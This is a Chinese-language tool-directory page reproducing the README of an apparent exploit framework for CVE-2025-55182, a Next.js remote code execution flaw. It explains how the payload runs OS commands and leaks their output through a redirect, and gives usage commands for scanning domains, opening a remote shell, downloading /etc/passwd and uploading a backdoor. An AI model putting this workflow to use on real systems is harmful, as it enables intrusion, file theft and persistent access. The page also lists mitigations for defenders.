Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell-cve-2025-55182 | Kitploit
工具/GitHubGitHub/opsecramdan/react2shell-cve-2025-55182
权限提升侦察漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制子域名枚举远程访问工具
GitHubopsecramdan/react2shell-cve-2025-55182

react2shell-cve-2025-55182

4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

🚨 React2Shell - CVE-2025-55182 漏洞利用框架

Severity Type Platform Python

针对 CVE-2025-55182(Next.js 远程代码执行)的高级漏洞利用框架

作者: opsecramdan


📚 目录

  • 概述
  • 漏洞详情
  • 功能特性
  • 环境要求
  • 安装
  • 使用方法
  • 交互式 Shell
  • 输出文件
  • 影响
  • 缓解措施
  • 局限性
  • 免责声明

📌 概述

React2Shell 是一个漏洞利用框架,用于识别和利用基于 Next.js 应用中的 CVE-2025-55182 漏洞。

该工具被设计为 一体化攻击工具包,涵盖:

  • 子域名枚举
  • 漏洞扫描
  • 漏洞利用引擎
  • 交互式远程 Shell

🔍 漏洞详情

  • CVE ID: CVE-2025-55182
  • 类型: 远程代码执行 (RCE)
  • 平台: Next.js
  • 攻击向量: 恶意的 multipart/form-data 请求
  • 影响: 任意命令执行

🧠 根本原因

该漏洞利用了 Next.js 的内部机制,方式如下:

  1. 将载荷(payload)注入请求
  2. 调用:process.mainModule.require('child_process')
  3. 执行操作系统命令
  4. 将输出进行 Base64 编码
  5. 通过重定向(/login?a=)泄漏结果

⚙️ 功能特性

🔎 子域名枚举

  • DNS + HTTP 扫描
  • 内置字典
  • 支持自定义字典
  • 自动保存结果

🧪 漏洞扫描器

  • 多端点测试:
  • /
  • /api
  • /api/auth
  • /_next
  • /admin
  • /dashboard
  • 请求头与响应分析
  • 减少误报

💣 漏洞利用引擎

  • 自动化载荷生成
  • Base64 编码执行
  • 基于重定向的输出提取

🖥️ 交互式 Shell

  • 远程命令执行
  • 持久会话
  • 目录跟踪

📂 文件操作

  • 上传文件
  • 下载文件
  • 创建文件

👑 Root 模式

  • sudo -i 执行
  • 权限提升模拟

📦 环境要求

  • Python 3.x

安装依赖: pip install requests dnspython


📥 安装

1. 克隆仓库

git clone https://github.com/yourusername/react2shell-cve-2025-55182.git

2. 进入目录

cd react2shell-cve-2025-55182

3. 运行工具

python3 react2shell.py


🚀 使用方法

🎯 单个目标

python3 react2shell.py -u https://target.com

不带协议:

python3 react2shell.py -u target.com


📄 多个目标

python3 react2shell.py -f targets.txt

targets.txt 内容示例:

https://target1.com http://target2.com:3000 target3.com


🌐 完整模式(侦察 + 扫描 + 漏洞利用)

python3 react2shell.py -d example.com

流程:

  1. 子域名枚举
  2. 漏洞扫描
  3. 漏洞利用(可选)

📚 自定义字典

python3 react2shell.py -d example.com -w wordlist.txt


🐞 调试模式

python3 react2shell.py -d example.com --debug


🖥️ 交互式 Shell

漏洞利用成功后,你将获得 Shell 访问权限。

基本命令

whoami
id
uname -a
pwd
ls -lah


⚙️ 特殊命令

命令

📂 上传文件

.upload shell.php /tmp/shell.php


📥 下载文件

.download /etc/passwd


📄 创建文件

.create /tmp/test.txt


🔄 示例工作流程

1. 扫描域名

python3 react2shell.py -d example.com

2. 识别易受攻击的目标

3. 进入 Shell

whoami

4. 上传载荷

.upload backdoor.sh /tmp/backdoor.sh


📁 输出文件

该工具将生成:

  • subdomains_*.txt
  • vulnerable_*.txt
  • output_*.txt

⚠️ 影响

如果成功利用:

  • 远程命令执行
  • 访问敏感文件
  • 上传后门
  • 持久化访问
  • 权限提升

🛡️ 缓解措施

  • 将 Next.js 更新到最新版本
  • 限制内部端点
  • 严格验证输入
  • 使用 WAF(OWASP CRS)
  • 监控异常活动

⚠️ 免责声明

此工具仅用于:

  • 学习
  • 研究
  • 经授权的渗透测试

禁止用于非法活动。


⭐ 说明

该项目展示了:

  • 高级漏洞利用技能
  • 对 Next.js 内部机制的理解
  • 真实世界攻击模拟
下载工具
描述
.root切换 Root 模式
.upload上传文件到目标
.download从目标下载文件
.create在目标上创建文件
.save将输出保存到本地文件
.exit退出 Shell